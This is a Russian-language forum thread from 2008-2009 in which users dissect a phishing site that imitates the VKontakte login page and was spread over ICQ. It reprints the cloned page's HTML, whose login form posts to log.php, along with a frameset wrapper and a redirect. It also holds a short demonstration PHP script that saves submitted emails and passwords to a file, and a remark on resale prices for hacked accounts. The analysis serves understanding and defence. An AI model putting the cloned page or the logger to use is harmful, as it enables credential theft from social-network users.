Вот, пришло сегодня:
обратите внимание на ссылку и сравните с настоящей http://vkontakte.ru/Сообщение (16:12:50 21/12/200
Ваша учётная запись: ICQ# 7323067
Отправитель: ICQ# 414393689
Запрос авторизации:
http://vkoontakte.tk/ Sro4no zaidite!!!
P.S. Кстати, кто-нибудь может подсказать куда можно обращаться для того чтобы забанить этот сайт, или что-нибудь зделать ещё...???
:http:donor.org.ua
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Примитивный фишинг...
Если введя левый пароль и емаил и тебя перебрасывает на сайт Вконтакте, могут ли уйти пароли? Может он их где-то перехватывает...
Да пароли с большой вероятностью уйдут не зависимо было перенаправление на официальный сайт или нет.Сообщение от senyak
Последний раз редактировалось Jolly Rojer; 22.12.2008 в 07:47.
Начинающим КуЛьХаЦкЕрАм, а так же продвинутым! - http://www.uk-rf.com/glava28.html
Не, Вы меня не так поняли. Если не вводить настоящие данные, а ввести от фоноря и меня перекидывает на настоящий сайт. Может перехватываются куки или еще что-то?
Смысла перехвавтывать куки в принципе особого нет. Интересуют как правило только вводимые данные.
Начинающим КуЛьХаЦкЕрАм, а так же продвинутым! - http://www.uk-rf.com/glava28.html
А если нажимаешь "Регистрация" - Невозможно отобразить страницу
даже помеченно что это fake, хоть и с ошибкойКод:<html> <head> <title>vkoontakte.tk</title> <meta name="description" content="vkoontakte.tk"> <meta name="keywords" content="универсальное,регистрация,пожаловать,вконтакте,контакте,добро"> </head> <frameset rows="*,0" framespacing="0" border="0" frameborder="NO"> <frame src="http://qwerty-feik.freehostia.com" name="dot_tk_frame_content" scrolling="auto" noresize> </frameset> <noframes> <body> </body> </noframes> </html>
а это уже код самого фишерского сайта. очень многое берется с оригинального вконтакте (он у меня в офисе заблокирован, так что отображается непонятно что)
пытаюсь понять как оно работает<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="vkontakte">
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1251" />
<title>В Контакте | Добро пожаловать</title>
<link rel="stylesheet" href="http://vkontakte.ru/css/rustyle.css?3" type="text/css" />
<link rel='stylesheet' href='http://vkontakte.ru/css/help.css?2' type='text/css' />
<link rel="shortcut icon" href="http://vkontakte.ru/images/favicon.ico" />
<!--[if lte IE 6]><style type="text/css" media="screen">/* <![CDATA[ */ @import url(css/ie.css?2); /* ]]> */</style><![endif]-->
<!--[if gte IE 7]><style type="text/css" media="screen">/* <![CDATA[ */ @import url(css/ie7.css); /* ]]> */</style><![endif]-->
<script src="http://vkontakte.ru/js/functions.js?5"></script>
<script src="http://vkontakte.ru/niftycube.js"></script>
<script type="text/javascript">
window.onload=function(){
Nifty("ul.tabs a","small top");
Nifty("ul.buttonRow a","small");
Nifty("div.leftAd","small transparent");
Nifty("div.selPad","small transparent");
Nifty("div.myPad","small transparent");
}
</script>
</head>
<body>
<div id="pageLayout">
<!-- pageHeader -->
<div id="pageHeader">
<h1 id="home"><a href="index.php">Студенты</a></h1>
<ul class="topNav" style='padding-right:5px'>
<li style="width:5.5em"><a href='faq.php'>помощь</a></li>
<li style="width:7.8em"><a href="javascript:document.location='reg0'">регистр ация</a></li>
<li style="width:4.0em"><a href='login.php'>вход</a></li>
</ul>
</div>
<!-- End pageHeader -->
<!-- sideBar -->
<div id="sideBar">
<div id="simplePage">
<form method="post" name="login" id="login" action="log.php" onSubmit="return CheckForm(this);">
<label for="email">Email:</label>
<input type="text" name="login" value="" class=w_100></td>
<label for="pass">Пароль:</label>
<input type="password" name="passwd" class=w_100></td>
<div style="height:20px;margin-top:5px;">
<ul class='nNav' style="width:128px;padding:0px;margin:0px;"><li style="margin:0px 3px 0px 0px;">
<b class="nc"><b class="nc1"><b></b></b><b class="nc2"><b></b></b></b>
<span class="ncc"><a href="javascript:document.login.submit()">Вход</a></span>
<b class="nc"><b class="nc2"><b></b></b><b class="nc1"><b></b></b></b>
</li>
<li style="margin:0px">
<b class="nc"><b class="nc1"><b></b></b><b class="nc2"><b></b></b></b>
<span class="ncc"><a href="javascript:document.location='reg0'">Регистр ация</a></span>
<b class="nc"><b class="nc2"><b></b></b><b class="nc1"><b></b></b></b>
</li></ul>
</div>
<div id="expirePad" style="display:none"><input style="margin-top:1px; vertical-align: middle;" type="checkbox" name="expire" id="expire" value="1" /> <small>Чужой компьютер</small></div>
<input type="submit" value='.' style="color:#fff;border:0;padding:0;margin:0;back ground:#fff;height:6px;width:6px"/>
</form>
</div>
<div style="width:124px">
</div>
</div>
<!-- End sideBar -->
<!-- pageBody -->
<div id="pageBody" class="pageBody">
<div id="wrapH">
<div id="wrapHI">
<div id="header">
<h1> Добро пожаловать</h1>
</div>
</div>
</div>
<div id="wrap2">
<div id="wrap1">
<div id="content">
<script type="text/javascript">
var memCount = 21001027;
var memPerSec = 0.644543754475;
function updateCount() {
next = -(1000 / memPerSec)*Math.log(Math.random());
memCountString = '' + memCount;
len = memCountString.length;
memCountString = memCountString.substr(0,len-6)+" "+memCountString.substr(len-6,3)+" "+memCountString.substr(len-3,3);
ge('memCount').innerHTML = memCountString;
memCount = memCount + 1;
setTimeout(updateCount, next);
}
window.onload = function(){
updateCount();
}
</script>
<div class="simplePage">
<h2><b>ВКонтакте.ру - универсальное средство поиска знакомых.</b></h2>
<p>Мы хотим, чтобы друзья, однокурсники, одноклассники, соседи и коллеги всегда оставались в контакте.</p>
<p>Нас уже <b id='memCount'>21001027</b>.</p>
<p><a href='http://www.alexa.com/site/ds/top_sites?cc=RU&ts_mode=country&lang=none' target='_blank'><b>ВКонтакте - самый посещаемый сайт в России</b></a>.</p>
<p>С помощью этого сайта Вы можете:</p>
<ul class="listing">
<li><span>Найти людей, с которыми Вы когда-либо учились, работали или отдыхали.</span></li>
<li><span>Узнать больше о людях, которые Вас окружают, и найти новых друзей.</span></li>
<li><span>Всегда оставаться в контакте с теми, кто Вам дорог.</span></li>
</ul>
<a class='noUnd' href='help.php?page=demo'><div class='tour' onmouseover="this.style.backgroundColor='#FCFBF5'" onmouseout="this.style.backgroundColor='#F9F6E7'"> <b>Экскурсия по сайту</b><div>О том, что Вас ждет после регистрации</div></div></a>
<div style="height:20px; margin:10px 10px 10px 210px">
<ul class='nNav'><li>
<b class="nc"><b class="nc1"><b></b></b><b class="nc2"><b></b></b></b>
<span class="ncc"><a href="javascript:document.login.submit()">Вход</a></span>
<b class="nc"><b class="nc2"><b></b></b><b class="nc1"><b></b></b></b>
</li>
<li>
<b class="nc"><b class="nc1"><b></b></b><b class="nc2"><b></b></b></b>
<span class="ncc"><a href="javascript:document.location='reg0'">Регистр ация</a></span>
<b class="nc"><b class="nc2"><b></b></b><b class="nc1"><b></b></b></b>
</li></ul>
</div>
</div>
<div id="boxHolder"></div>
</div>
</div>
</div>
</div>
<!-- End pageBody -->
<!-- bFooter -->
<div id="bFooter">
<ul class="bNav">
<li><a href="help.php?page=about">о сайте</a></li>
<li><a href="club2007">техподдержка</a></li>
<li><a href="blog.php">блог</a></li>
<li><a href="help.php?page=terms">правила</a></li>
</ul>
</div>
<div id="bFooter">
<p>В Контакте © 2006-2008 <br /><small><a href="id1">Павел Дуров</a></small></p>
</div>
</div>
<!-- End pageLayout 130 -->
<script type="text/javascript">
Rounded('rounded', 6, 6);
</script>
</body>
</html>
Добавлено через 31 минуту
с переадресацией всё понятно - человека перекидывает на log.php -
видимо при вводе какой-то скрипт записывает введенные данные.Код:<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vkontakte.ru/mail.php'></head></html>
Последний раз редактировалось ScratchyClaws; 22.12.2008 в 09:58. Причина: Добавлено
At this very moment, your eternal soul may be less than twenty miles from the burning fires of hell. If you go to hell, be sure - you'll be there forever... (c, Primal Fear, Devil's ground)
сайт прикрыли.... а я так и не успела его скачать ;(
At this very moment, your eternal soul may be less than twenty miles from the burning fires of hell. If you go to hell, be sure - you'll be there forever... (c, Primal Fear, Devil's ground)
А зачем он Вам?
хотела разобраться как оно пароли с логинами собирает. никак до скрипта докопаться не могла.
At this very moment, your eternal soul may be less than twenty miles from the burning fires of hell. If you go to hell, be sure - you'll be there forever... (c, Primal Fear, Devil's ground)
Эмм...
Странно все это...
На каком языке был написан скрипт логирующий пароли/логины?..
// ...
priv8v, java script, думаю. Только в теле странички ничего криминального не нашлось.. а остальные файлы с сервера скачать не удалось - пока подбирали программу, сайт закрылся/
At this very moment, your eternal soul may be less than twenty miles from the burning fires of hell. If you go to hell, be sure - you'll be there forever... (c, Primal Fear, Devil's ground)
если честно, то мне ни разу не встречались фишерские сайты, которые бы делали логирование паролей с помощью ява-скрипта.
// ...
а как они это делали?
есть страничка, код которой приведен выше. далее открывается пустая страничка, функции которой только в перебрасывании на контакт. про скрипт это всего лишь предположение (я же не могу сказать точно на каком языке скрипт который я так и не нашла?)
At this very moment, your eternal soul may be less than twenty miles from the burning fires of hell. If you go to hell, be sure - you'll be there forever... (c, Primal Fear, Devil's ground)
То, что выше, как я понял - это лишь страница с формой, которую нужно заполнить...
В теории у нее есть приемщик, которому методом GET или POST передаются данные введенные в форму - скрипт (пхп) уже сможет с этими данными делать что угодно - обрабатывать их, проверять на валидность, на то, ввели что-то или нет, логировать пароль/логин, перебрасывать куда-то и т.д
Пхп - выполняется на сервере, и исходный код скрипта можно увидеть лишь получив фтп доступ или доступ к файлам, как к файлам, а не как к скриптам, которые выполняются (зайти на сайт через админку, взломать сайт и залить свою админку - шелл и т.д).
Вот для демонстрации накинул пару строк:
Скрипт этот делает следующее:Код:<?php error_reporting(0); $email=$_POST['email']; $pass=$_POST['pass']; $lоg = "'log'"; $file = fopen($log, "a+"); $str = " Мыло: $email' Пароль: $pass \r\n"; fputs ($file, $str); fclose($file); header("Location': http://vkontakte.ru'"); ?>
принимает пост-запрос (в кол-ве двух штук) , пишет полученные данные в файл и перекидывает на сайт вконтакте. Никакой проверки на введенные данные нет, ничего нет.
Прошу не считать этот скрипт вредоносным - ничего плохого он не делает и никто во зло его использовать не сможет вообще его хотя бы заставить работать, то именно ради прикола - т.к если сможет его заюзать, то значит и сам он прекрасно сможет такой написать.
Последний раз редактировалось priv8v; 24.12.2008 в 23:53. Причина: поправил скрипт :D
// ...
вот ради всех этих скриптов я и пыталась скачать весь сайт... но из всего выкачанного никакого криминала не нашлось ;(
At this very moment, your eternal soul may be less than twenty miles from the burning fires of hell. If you go to hell, be sure - you'll be there forever... (c, Primal Fear, Devil's ground)
Вот даже интересно какого лешему нужны чужие пароли от контакта??
Нужны, на некоторых кулхацкерских ресурсах взлом аккаунта "Вконтакте" доходит до 7.500-8.000 р+для рассылки спама...Вот даже интересно какого лешему нужны чужие пароли от контакта??
а меня спалили прислали письмо на мэил.ру
Я там не зареган, по мылу узнали, оно у мну уже лет 12 и всем известнаЛеонид Шарипов wrote something on your wall.
Best regards,
VKontakte.ru Administration
Хочу передать большой привет, в отличии от вас я не скрываюсь...
что гемморой открылся?
Хотя чёт не помню, мож та регился когда то
Короче нашёл, оказывается регился когда то в детстве
Последний раз редактировалось valho; 27.03.2009 в 19:34.
Ваши права в разделе
Ответить с цитированием
